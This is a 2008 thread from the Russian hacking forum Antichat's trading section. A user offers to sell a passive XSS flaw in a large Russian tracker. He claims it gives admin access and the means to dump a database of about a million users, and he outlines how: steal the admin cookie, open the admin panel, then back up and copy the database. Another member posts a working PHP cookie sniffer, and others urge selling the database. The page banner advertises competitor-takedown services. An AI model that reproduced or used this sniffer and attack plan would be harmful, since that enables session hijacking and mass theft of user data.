Xss в крупном Российском трекере

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ > Покупка, Продажа, Обмен > Разное - Покупка, продажа, обмен
Xss в крупном Российском трекере

Страница 1 из 4

Опции темы

Поиск в этой теме

Опции просмотра

Xss в крупном Российском трекере

17.07.2008, 15:06

geforse

Постоянный

Регистрация: 02.03.2008

Сообщений: 893

С нами: 9574565

Репутация: 712

Xss в крупном Российском трекере

Пассивная XSS в крупнейшем Российском трекере (не торрентс)

За подробностями 643~770
---------------------------------------------------------------------------
Возможность слить БД (~1000000 пользователей) и получить доступ к Админ-Панели!

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось geforse; 17.07.2008 в 20:51..

17.07.2008, 15:10

.Striker

Участник форума

Регистрация: 11.11.2007

Сообщений: 260

С нами: 9736147

Репутация: 155

Возможность слить БД

как ты через xxs бд будешь сливать?)

17.07.2008, 15:13

geforse

Постоянный

Регистрация: 02.03.2008

Сообщений: 893

С нами: 9574565

Репутация: 712

.Striker
Ну давай подумаем:

Код:

1. Получаем куки админа
2. Сразу идём в админку
3. Резервная копия БД
4. Начать копирование

Так более яснее ?

17.07.2008, 15:14

.Striker

Участник форума

Регистрация: 11.11.2007

Сообщений: 260

С нами: 9736147

Репутация: 155

ты сначала получи куки и без палева слей её если получится

а потом отпиши

если сайт крупный, то думаю тама за всем пасут

17.07.2008, 15:18

geforse

Постоянный

Регистрация: 02.03.2008

Сообщений: 893

С нами: 9574565

Репутация: 712

Доступ в админ панель я получал.
Банальное сообщение: "У вас тут плохо сайт работает"
Куки у меня и я админ!
-------------------------------------------------------------------

Сейчас снифер античатовский прост не работает))
У кого есть альтернативный, пишите, наделаю скринов бд, сайта и админки

Цитата:

Сообщение от .Striker

если сайт крупный, то думаю тама за всем пасут

XSS я обнаружил ~2 недели назад, ещё актуальна и закрывать повидимому не собираются

З.Ы. Плиз без флуда ( =

Последний раз редактировалось geforse; 17.07.2008 в 15:20..

17.07.2008, 15:22

.Striker

Участник форума

Регистрация: 11.11.2007

Сообщений: 260

С нами: 9736147

Репутация: 155

сниффер
<?php
$ip = getenv("REMOTE_ADDR");
$rhost = getenv("HTTP_REFERER");
$input = getenv("QUERY_STRING");
$date=(date("d.m.y"));
$time=(date("H:i"));
$fp = @fopen("snif.txt", "a");
@fputs($fp, "Дата: [ $date ] Время: [ $time ] IP: $ip Хост: $rhost Инфа $input \n");
@fclose($fp);
?>

17.07.2008, 15:24

~~De-visible~~

Banned

Регистрация: 06.01.2008

Сообщений: 904

С нами: 9655526

Репутация: 1821

Цитата:

Сообщение от geforse

Чем не устроил сниффер от GreenBear?

17.07.2008, 15:27

Kaimi

Познавший АНТИЧАТ

Регистрация: 23.08.2007

Сообщений: 1,237

С нами: 9851426

Репутация: 1676

Продавал бы тогда уж сразу бд

17.07.2008, 15:31

geforse

Постоянный

Регистрация: 02.03.2008

Сообщений: 893

С нами: 9574565

Репутация: 712

Цитата:

Сообщение от De-visible

Чем не устроил сниффер от GreenBear?

Я его и имел ввиду (XSS тестировалась именно на нём) {он сейчас не работает(}

Цитата:

Сообщение от Kaimi

Продавал бы тогда уж сразу бд

Что-то не хочется мне торговать БД ( =
-----------------------------------------------

Все предложения по поводу XSS в ПМ или ICQ

#10

17.07.2008, 18:46

geforse

Постоянный

Регистрация: 02.03.2008

Сообщений: 893

С нами: 9574565

Репутация: 712

XSS в сообщении, выглядит так:

Страница 1 из 4

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
Microsoft addresses XSS in Internet Explorer	Fugitif	Forum for discussion of ANTICHAT	3	08.07.2008 03:47
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход